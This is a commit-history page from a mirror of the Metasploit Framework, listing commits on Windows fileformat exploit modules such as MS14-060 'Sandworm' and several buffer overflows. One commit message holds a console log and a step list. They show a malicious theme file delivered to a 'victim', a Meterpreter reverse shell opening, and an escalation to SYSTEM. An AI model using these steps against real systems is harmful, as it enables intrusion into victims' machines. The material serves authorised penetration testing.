infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
36,031 Commits
7 Branches
556 Tags
421 MiB
Commit Graph

764 Commits (9f4f478d2ddc021fcc1a810bee7f42030a243566)

Author SHA1 Message Date
Matthew Hall 4757698c15 Modify primer to utilise file_contents macro. 2015-03-04 09:52:00 +00:00
Matthew Hall e6ecdde451 Modify SMB generation code to use primer based on #3074 changes to 
implement Msf::Exploit::Remote::SMB::Server::Share as a mixin.
 2015-02-20 11:35:22 +00:00
jakxx 44a7e7e4bc publish-it fileformat exploit 2015-02-18 13:22:54 -05:00
jvazquez-r7 0372b08d83 Fix mixin usage on modules 2015-02-13 17:17:59 -06:00
jvazquez-r7 92422c7b9a Save the output file on local_directory 2015-02-12 16:16:21 -06:00
jvazquez-r7 831a1494ac Keep default behavior for modules forcing Msf::Encoder::Type::AlphanumUpper 2015-02-08 18:29:25 -06:00
jvazquez-r7 3e7e9ae99b Keep default behavior for modules forcing Msf::Encoder::Type::AlphanumMixed 2015-02-08 18:22:11 -06:00
sinn3r 9112e70187 Fix #4693 - Uninit Rex::OLE in MS14-064 exploits 
Fix #4693
 2015-02-02 00:20:34 -06:00
Tod Beardsley bae19405a7
Various grammar, spelling, word choice fixes 2015-01-26 11:00:07 -06:00
sinn3r 2ed05869b8 Make Msf::Exploit::PDF follow the Ruby method naming convention 
Just changing method names.

It will actually also fix #4520
 2015-01-06 12:42:06 -06:00
William Vu f2710f6ba7
Land #4443, BulletProof FTP client exploit 2015-01-06 02:10:42 -06:00
William Vu 482cfb8d59
Clean up some stuff 2015-01-06 02:10:25 -06:00
Gabor Seljan 0b85a81b01 Use REXML to generate exploit file 2014-12-24 19:23:28 +01:00
Gabor Seljan 9be95eacb8 Use %Q for double-quoted string 2014-12-22 07:37:32 +01:00
sgabe bb33a91110 Update description to be a little more descriptive 2014-12-21 19:31:58 +01:00
sgabe cd02e61a57 Add module for OSVDB-114279 2014-12-21 17:00:45 +01:00
sgabe 9f97b55a4b Add module for CVE-2014-2973 2014-12-20 18:38:22 +01:00
Christian Mehlmauer 0f27c63720
fix msftidy warnings 2014-12-12 13:16:21 +01:00
Christian Mehlmauer 544f75e7be
fix invalid URI scheme, closes #4362 2014-12-11 23:34:10 +01:00
Tod Beardsley dd1920edd6
Minor typos and grammar fixes 2014-11-13 14:48:23 -06:00
jvazquez-r7 31f3aa1f6d Refactor create packager methods 2014-11-13 01:16:15 -06:00
jvazquez-r7 38a96e3cfc Update target info 2014-11-13 00:56:42 -06:00
jvazquez-r7 e25b6145f9 Add module for MS14-064 bypassing UAC through python for windows 2014-11-13 00:56:10 -06:00
jvazquez-r7 c35dc2e6b3 Add module for CVE-2014-6352 2014-11-12 01:10:49 -06:00
sinn3r 1b2554bc0d Add a default template for CVE-2010-1240 PDF exploit 2014-11-05 17:08:38 -06:00
Tod Beardsley 6812b8fa82
Typo and grammar 2014-10-20 11:02:09 -05:00
sinn3r 8b5a33c23f
Land #4044 - MS14-060 "Sandworm" 2014-10-17 16:46:32 -05:00
jvazquez-r7 70f8e8d306 Update description 2014-10-17 16:17:00 -05:00
jvazquez-r7 e52241bfe3 Update target info 2014-10-17 16:14:54 -05:00
sinn3r ef1556eb62 Another update 2014-10-17 13:56:37 -05:00
jvazquez-r7 8fa648744c Add @wchen-r7's unc regex 2014-10-17 13:46:13 -05:00
URI Assassin 35d3bbf74d
Fix up comment splats with the correct URI 
See the complaint on #4039. This doesn't fix that particular
issue (it's somewhat unrelated), but does solve around
a file parsing problem reported by @void-in
 2014-10-17 11:47:33 -05:00
jvazquez-r7 e5903562ee Delete bad/incomplete validation method 2014-10-17 10:36:01 -05:00
sinn3r a79427a659 I shoulda checked before git commit 2014-10-17 00:54:45 -05:00
sinn3r 4c0048f26a Update description 2014-10-17 00:46:17 -05:00
jvazquez-r7 1d16bd5c77 Fix vulnerability discoverer 2014-10-16 18:01:45 -05:00
jvazquez-r7 807f1e3560 Fix target name 2014-10-16 17:58:45 -05:00
jvazquez-r7 c1f9ccda64 Fix ruby 2014-10-16 17:55:00 -05:00
jvazquez-r7 e40642799e Add sandworm module 2014-10-16 16:37:37 -05:00
William Vu 9f6a40dfd6
Fix bad pack in mswin_tiff_overflow 
Reported by @egyjuzer in #3706.
 2014-08-26 11:14:44 -05:00
jvazquez-r7 b259e5b464 Update description again 2014-08-07 09:21:25 -05:00
jvazquez-r7 4af0eca330 Update target description 2014-08-07 09:11:01 -05:00
William Vu 25f74b79b8
Land #3484, bad pack/unpack specifier fix 2014-07-16 14:52:23 -05:00
jvazquez-r7 8937fbb2f5 Fix email format 2014-07-11 12:45:23 -05:00
HD Moore c9b6c05eab Fix improper use of host-endian or signed pack/unpack 
Note that there are some cases of host-endian left, these
are intentional because they operate on host-local memory
or services.

When in doubt, please use:

```
ri pack
```
 2014-06-30 02:50:10 -05:00
Christian Mehlmauer 8e1949f3c8
Added newline at EOF 2014-06-17 21:03:18 +02:00
Matthew Hall f72d54b9df Refactor ms13_071_theme to utilise `Msf::Exploit::Remote::SMBFileServer` 
This commit refactors the ms13_071_theme module written by @jvazques-r7
to utilise the Rex SMBFileServer protocol and remove duplicate code from
Metasploit.

```
[*] Processing test3.msf for ERB directives.
resource (test3.msf)> use exploits/windows/fileformat/ms13_071_theme
resource (test3.msf)> set VERBOSE true
VERBOSE => true
resource (test3.msf)> set SHARE share
SHARE => share
resource (test3.msf)> set SCR exploit.scr
SCR => exploit.scr
resource (test3.msf)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (test3.msf)> set LHOST 172.32.255.1
LHOST => 172.32.255.1
resource (test3.msf)> set SRVHOST 172.32.255.1
SRVHOST => 172.32.255.1
resource (test3.msf)> set LPORT 4444
LPORT => 4444
resource (test3.msf)> exploit
[*] Started reverse handler on 172.32.255.1:4444
[*] Generating our malicious executable...
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /root/.msf4/local/msf.theme
[+] Let your victim open msf.theme
[*] Starting SMB Server on: \\172.32.255.1\share\exploit.scr
[*] Starting SMB Server on 172.32.255.1:445
[*] Sending stage (769536 bytes) to 172.32.255.129
[*] Meterpreter session 1 opened (172.32.255.1:4444 -> 172.32.255.129:1096) at 2014-04-30 12:05:46 +0100

meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

1. use exploits/windows/fileformat/ms13_071_theme
2. set payload windows/meterpreter/reverse_tcp
3. set LHOST
4. set SRVHOST
5. exploit
6. Copy msf.theme to target
7. Open theme and navigate to "Screensaver" tab
8. Enjoy shells

- [ ] Land #3074
- [ ] Land #3075
- [ ] Run exploits/windows/fileformat/ms13_071_theme
- [ ] Let target open malicious msf.theme file

* Windows XP SP3
 2014-04-30 12:14:58 +01:00
sinn3r b1ac0cbdc7
Land #3239 - Added target 6.1 to module 2014-04-28 18:28:14 -05:00
Tod Beardsley 1b4fe90003
Fix msftidy warnings on wireshark exploits 2014-04-28 19:51:38 +01:00
sinn3r cde9080a6a Move module to fileformat 2014-04-24 13:17:08 -05:00
Ken Smith 66b1c79da9 Update rop chain for versions 6.2 and 6.1 2014-04-21 13:27:14 -04:00
Ken Smith c99f6654e8 Added target 6.1 to module 2014-04-11 09:59:11 -04:00
Spencer McIntyre 3f6c8afbe3 Fix typo of MSCOMCTL not MCCOMCTL 2014-04-08 14:52:18 -04:00
Spencer McIntyre 85197dffe6 MS14-017 Word RTF listoverridecount memory corruption 2014-04-08 14:44:20 -04:00
Tod Beardsley 7572d6612e
Spelling and grammar on new release modules 2014-04-07 12:18:13 -05:00
jvazquez-r7 56bd35c8ce Add module for WinRAR spoofing vulnerability 2014-04-07 09:21:49 -05:00
sinn3r d7ca537a41 Microsoft module name changes 
So after making changes for MSIE modules (see #3161), I decided to
take a look at all MS modules, and then I ended up changing all of
them. Reason is the same: if you list modules in an ordered list
, this is a little bit easier to see for your eyes.
 2014-03-28 20:56:53 -05:00
Tod Beardsley 8f2124f5da
Minor updates for release 
Fixes some title/desc action.
Adds a print_status on the firefox module so it's not just silent.
Avoids the use of "puts" in the description b/c this freaks out msftidy
(it's a false positive but easily worked around).
 2014-03-17 13:26:26 -05:00
sinn3r 243fa4f56a
Land #2910 - MPlayer Lite M3U Buffer Overflow 2014-03-13 14:13:17 -05:00
sinn3r e832be9eeb Update description and change ranking 
The exploit requires the targeted user to open the malicious in
specific ways.
 2014-03-13 14:09:37 -05:00
William Vu 25ebb05093 Add next chunk of fixes 
Going roughly a third at a time.
 2014-03-11 12:23:59 -05:00
sgabe 408fedef93 Add module for OSVDB-98283 2014-03-04 00:51:01 +01:00
Tod Beardsley de6be50d64
Minor cleanup and finger-wagging about a for loop 2014-03-03 14:12:22 -06:00
Meatballs 63751c1d1a
Small msftidies 2014-02-28 22:18:59 +00:00
sinn3r 7625dc4880 Fix syntax error due to the missing , 2014-02-27 14:25:52 -06:00
sinn3r 49ded452a9 Add OSVDB reference 2014-02-27 14:22:56 -06:00
sinn3r e72250f08f Rename Total Video Player module 
The filename shouldn't include the version, because the exploit should
be able to target multiple versions if it has to.
 2014-02-27 14:20:26 -06:00
Fr330wn4g3 63f74bddae 2° update total_video_player_131_ini_bof 2014-02-27 16:41:35 +01:00
Fr330wn4g3 b81642d8ad Update total_video_player_131_ini_bof 2014-02-26 11:37:04 +01:00
Fr330wn4g3 a7cacec0c3 Add module for EDB 29799 2014-02-25 23:07:28 +01:00
Tod Beardsley 721e153c7f
Land #3005 to the fixup-release branch 
Prefer the intel on #3005 over my own made up 0day guess. Thanks @wvu!

Conflicts:
	modules/exploits/windows/fileformat/audiotran_pls_1424.rb
 2014-02-18 14:08:54 -06:00
Tod Beardsley a863d0a526
Pre-release fixes, including msftidy errors. 2014-02-18 14:02:37 -06:00
William Vu 28dc742bcf Fix references and disclosure date 2014-02-18 13:59:58 -06:00
Philip OKeefe 98958bc7bc Making audiotran_pls_1424 more readable and adding comments 2014-02-17 13:40:03 -05:00
Philip OKeefe c60ea58257 added audiotran_pls_1424 fileformat for Windows 2014-02-16 16:20:50 -05:00
jvazquez-r7 9845970e12 Use pop#ret to jump over the overwritten seh 2014-02-12 08:10:14 -06:00
sgabe 11513d94f5 Add Juan as author 2014-02-12 12:17:02 +01:00
sgabe 3283880d65 Partially revert "Replace unnecessary NOP sled with random text" to improve reliability. 
This partially reverts commit 12471660e9.
 2014-02-12 12:09:16 +01:00
sgabe 7195416a04 Increase the size of the NOP sled 2014-02-12 02:35:53 +01:00
sgabe 3f09456ce8 Minor code formatting 2014-02-11 23:53:04 +01:00
sgabe 7fc3511ba9 Remove unnecessary NOPs 2014-02-11 23:48:54 +01:00
sgabe 12471660e9 Replace unnecessary NOP sled with random text 2014-02-11 23:48:04 +01:00
sgabe 184ccb9e1e Fix payload size 2014-02-11 23:42:58 +01:00
jvazquez-r7 3717374896 Fix and improve reliability 2014-02-11 10:44:58 -06:00
sgabe e8a3984c85 Fix ROP NOP address and reduce/remove NOPs 2014-02-11 00:29:37 +01:00
sgabe 08b6f74fb4 Add module for CVE-2010-2343 2014-02-10 20:46:09 +01:00
William Vu 47b9bfaffc Use opts hash for adobe_pdf_embedded_exe 
https://dev.metasploit.com/redmine/issues/8498
 2014-01-24 20:16:53 -06:00
sgabe 16b8b58a84 Fix the dwSize parameter 2014-01-24 11:38:57 +01:00
sgabe 8f6dcd7545 Add some randomization to the ROP chain 2014-01-24 10:28:59 +01:00
sgabe 021aa77f5f Add module for BID-46926 2014-01-24 01:48:21 +01:00
sgabe b4280f2876 Very minor code formatting 2014-01-14 13:35:00 +01:00
sgabe e7cc3a2345 Removed unnecessary target 2014-01-13 13:17:16 +01:00
sgabe 26d17c03b1 Replaced ROP chain 2014-01-13 02:54:49 +01:00
sgabe d657a2efd3 Added DEP Bypass 2014-01-11 20:31:28 +01:00
sgabe 72d15645df Added more references 2014-01-11 20:30:50 +01:00
sgabe 8449005b2a Fixed CVE identifier. 2014-01-10 23:45:34 +01:00
Tod Beardsley cd38f1ec5d
Minor touchups to recent modules. 2014-01-03 13:39:14 -06:00
William Vu 2d25781cf0
Land #2804 for real (thanks, @jvazquez-r7!) 
It was the wrong time to mess with my workflow.
 2014-01-02 16:39:02 -06:00
William Vu 67a796021d
Land #2804, IBM Forms Viewer 4.0 exploit 2014-01-02 16:10:02 -06:00
jvazquez-r7 eaeb457d5e Fix disclosure date and newline as pointed by @wvu-r7 2014-01-02 16:08:44 -06:00